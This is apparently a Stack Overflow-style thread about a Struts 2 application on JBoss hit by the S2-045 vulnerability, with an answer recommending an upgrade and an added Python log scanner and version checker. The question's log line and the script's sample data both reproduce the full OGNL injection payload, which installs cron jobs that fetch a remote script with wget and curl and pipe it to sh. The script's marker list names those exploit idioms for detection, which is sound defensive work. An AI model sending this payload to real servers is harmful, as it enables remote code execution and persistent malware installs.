JBOSS Struts 2 application intrusions

Published 2019-08-17 09:14

Question:

We have a J2EE Struts 2 application.

Recently we have seen some intrusions coming into our application, which runs on port 80. The JBoss (version 4.2.0) error log shows this:

the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "15 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n50 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

They are injecting some .exe files into the JBoss bin folder and trying to interrupt the application as well as the server. We have already installed some antivirus software there, but that doesn't stop it. We are thinking about how to stop them from the application side.

Any good idea will be helpful.

Answer 1:

You've been attacked through the S2-045 critical security issue.

The simplest solution to your problem is to upgrade immediately to either 2.3.32 or 2.5.10.1
(the former will require almost zero refactoring, the latter would require a quick migration, described in the Struts 2.3 to 2.5 Migration Guide).

Always stay up-to-date.
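The log line in the question is the fingerprint of an S2-045 attempt: the attacker puts an OGNL expression in the Content-Type header, the multipart parser rejects it, and the Jakarta error message echoes the header, which Struts then evaluates. Until the upgrade is done it is useful to sweep the existing logs for the same pattern and to confirm the deployed version is past the fix. The script below is an added example, not code from the question or the answer; the two log lines it scans are constructed to mirror the message format shown above (the first one reuses the payload from the question, the second is a benign multipart failure), the marker list and the `2.3.32` / `2.5.10.1` thresholds come from the answer, and the function names are my own.

```python
import re

# Constructed sample log lines, modelled on the JBoss error message in the question.
# Line 1 reuses the S2-045-style payload shown there; line 2 is a benign multipart
# failure (wrong Content-Type) that must not be flagged.
SAMPLE_LOG = r"""2019-08-17 09:14:02,113 ERROR [org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest] the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "15 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n50 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
2019-08-17 09:15:40,521 ERROR [org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest] the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is application/x-www-form-urlencoded
"""

# Substrings that only show up when the Content-Type carries an OGNL expression.
# The first two are the "unlock member access" idiom in the question's payload.
OGNL_MARKERS = (
    "#_memberAccess",
    "DEFAULT_MEMBER_ACCESS",
    "setMemberAccess",
    "getExcludedPackageNames",
    "ProcessBuilder",
    "@java.lang.Runtime@",
)

# Prefix the JakartaMultiPartRequest message uses before echoing the header.
CT_PREFIX = "content type header is "

# Minimum fixed versions named in the answer, keyed by the 2.x release line.
FIXED_VERSIONS = {(2, 3): (2, 3, 32), (2, 5): (2, 5, 10, 1)}


def extract_content_type(line):
    """Return the echoed Content-Type from a multipart error line, or None."""
    idx = line.find(CT_PREFIX)
    if idx < 0:
        return None
    return line[idx + len(CT_PREFIX):].strip()


def classify_content_type(content_type):
    """Return ('ognl', markers_hit) for an injected header, else ('benign', [])."""
    hits = [m for m in OGNL_MARKERS if m in content_type]
    # A real Content-Type never starts with an expression delimiter; treat that,
    # or two or more markers, as an injection attempt.
    if content_type.startswith(("%{", "${")) or len(hits) >= 2:
        return "ognl", hits
    return "benign", []


def scan_log(text):
    """Scan log text and return one finding per injected Content-Type seen."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        ct = extract_content_type(line)
        if ct is None:
            continue
        verdict, hits = classify_content_type(ct)
        if verdict != "ognl":
            continue
        # Pull out the shell command and any download URLs so the IOC is
        # visible without reading the whole expression.
        cmd = re.search(r"#cmd='([^']*)'", ct)
        findings.append({
            "line": lineno,
            "markers": hits,
            "command": cmd.group(1) if cmd else None,
            "urls": sorted(set(re.findall(r"https?://[^\s'\"|)]+", ct))),
        })
    return findings


def parse_version(version):
    return tuple(int(part) for part in version.split("."))


def is_patched_for_s2_045(version):
    """True if the Struts version is at or past the fix for its release line.

    Lines other than 2.3 and 2.5 are compared against 2.5.10.1 (assumption:
    anything newer than that line shipped after the fix).
    """
    v = parse_version(version)
    return v >= FIXED_VERSIONS.get(v[:2], (2, 5, 10, 1))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line", f["line"], "markers:", ", ".join(f["markers"]))
        print("  command:", f["command"])
        print("  urls:", f["urls"])
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(ver, "patched" if is_patched_for_s2_045(ver) else "VULNERABLE")
```

Run it against the real `server.log` by replacing `SAMPLE_LOG` with the file contents; the extracted URLs are what to block at the egress firewall and what to look for in the crontab of the affected host, since the payload in the question installs a cron job that re-downloads the dropper every hour. The version check is deliberately strict about the release line: `2.5.10` is below `2.5.10.1` and is still vulnerable, which the answer's two version numbers imply but a casual "2.5.10 looks new enough" reading would miss.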